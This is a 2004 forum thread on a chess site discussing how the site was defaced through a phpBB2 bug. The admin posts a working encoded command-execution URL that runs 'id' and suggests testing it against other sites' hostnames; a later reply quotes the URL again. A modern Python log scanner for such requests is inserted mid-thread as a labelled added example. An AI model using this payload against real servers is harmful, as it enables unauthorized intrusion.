Any information about the hack?

For discussion pertaining to Chess, Net-Chess, or general interests.
awacs
Posts: 2
Joined: Tue Nov 23, 1999 2:07 pm

Any information about the hack?

Post by awacs » Sun Dec 12, 2004 10:33 pm

... site seems like it's back up and running. :-)

jpettit
Posts: 70
Joined: Thu Jan 18, 2001 11:55 am

Post by jpettit » Sun Dec 12, 2004 10:41 pm

Unbelievable! :evil:

Is superchessking still around, still making trouble? I'm gone for a year, but some things never change --

But really, THIS site?! Some people....

Real issue: how can we make sure that this doesn't happen again?

gmiller
Site Admin
Posts: 1388
Joined: Sun Mar 14, 1999 11:13 am
Location: Jeffersonville, IN

Post by gmiller » Mon Dec 13, 2004 6:32 pm

There's not much information to give, someone just replaced a bunch of the pages with a "you've been hacked page". If you look at the 2004 tourny page, you'll see what it looked like because I haven't fixed that one yet.

As far as the phpBB2 bug goes, it allowed anyone to execute any shell command they wanted using a specially crafted URL like the following:
http://www.net-chess.com/phpBB2/viewtop ... ight=%2527
%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)
%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)
%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)
%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(105)
%252echr(100)%252echr(59)%252echr(101)%252echr(99)
%252echr(104)%252echr(111)%252echr(32)%252echr(95)
%252echr(95)%252echr(95)%252echr(70)%252echr(73)
%252echr(77)%252echr(95)%252echr(95)%252echr(95)
%252echr(59))%252e%2527

(if you know another site that uses phpBB2 you can edit the hostname in that URL to see if theirs has been fixed yet).

The bug was announced on the mailing list Bugtraq. The a-hole who defaced this site just saw the bug announcement and used it, not like he's a genius or anything.

I wouldn't think for a minute it was Superchessking, as he's just an idiot. Whoever hit this site probably just punched phpBB2 into Google and started hitting sites.
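A defender-side check for the kind of request gmiller describes, written here as an added example (it is not code from this thread or from the phpBB project): it scans access-log lines for a query parameter that was URL-encoded twice and, after the second decode, reads as a quoted PHP function call instead of a search word. The log lines, client addresses and the topic id are constructed for the example; the script checks every query parameter rather than only `highlight`, so it generalizes slightly beyond the post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined-format access log line: client address first, request line in quotes.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A percent-escape that survives the first decode means the value was encoded twice
# (%2527 -> %27); search words submitted from a form are encoded only once.
LEFTOVER_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")
# Decoded content that reads as a PHP call rather than a search term.
PHP_CALL = re.compile(r"\b(?:system|passthru|exec|shell_exec|eval|chr)\s*\(", re.IGNORECASE)


def inspect_request(target: str) -> list:
    """Return one finding per query parameter that is double-encoded and, once fully
    decoded, contains a quote character followed by a PHP-style function call."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes once
    for name, values in params.items():
        for once in values:
            if not LEFTOVER_ESCAPE.search(once):
                continue  # encoded a single time: ordinary form input
            decoded = unquote(once)  # second decode, the step the vulnerable code performed
            if "'" in decoded and PHP_CALL.search(decoded):
                findings.append({"param": name, "decoded": decoded})
    return findings


def scan_access_log(text: str) -> list:
    """Run inspect_request over every access-log line and return flagged requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for finding in inspect_request(target):
            hits.append({"client": client, "target": target, **finding})
    return hits


# Constructed sample log: one normal search, one double-encoded request, one unrelated hit.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2004:02:14:07 -0500] "GET /phpBB2/viewtopic.php?t=42&highlight=sicilian HTTP/1.1" 200 8812
203.0.113.9 - - [13/Dec/2004:02:15:31 -0500] "GET /phpBB2/viewtopic.php?t=42&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.1" 200 9140
203.0.113.9 - - [13/Dec/2004:02:16:02 -0500] "GET /phpBB2/index.php HTTP/1.1" 200 5102
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['client']} {hit['param']} -> {hit['decoded']}")
```

Only the second line is flagged: its `highlight` value still contains `%27` after the web server's decode, and decoding it again yields a quoted `system(...)` call. A plain search term such as `sicilian` never survives the first decode with escapes left in it, which is what keeps the rule quiet on normal traffic.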

dragondude
Posts: 15
Joined: Sat Nov 25, 2000 3:16 pm

jjones ?? at work or play ??

Post by dragondude » Tue Dec 14, 2004 3:42 am

gmiller wrote: As far as the phpBB2 bug goes, it allowed anyone to execute any shell command they wanted using a specially crafted URL like the following:
http://www.net-chess.com/phpBB2/viewtop ... ight=%2527
%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)
%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)
%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)
%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(105)
%252echr(100)%252echr(59)%252echr(101)%252echr(99)
%252echr(104)%252echr(111)%252echr(32)%252echr(95)
%252echr(95)%252echr(95)%252echr(70)%252echr(73)
%252echr(77)%252echr(95)%252echr(95)%252echr(95)
%252echr(59))%252e%2527

(.
WOW ... making up bugs to "ZAP" people is certainly an art that looks more difficult than chess... maybe that's how the original "zapper" :wink: on this site was able to zap me a few years ago. :roll: looks more complicated than the Sicilian Richter-Rauzer Attack 8)
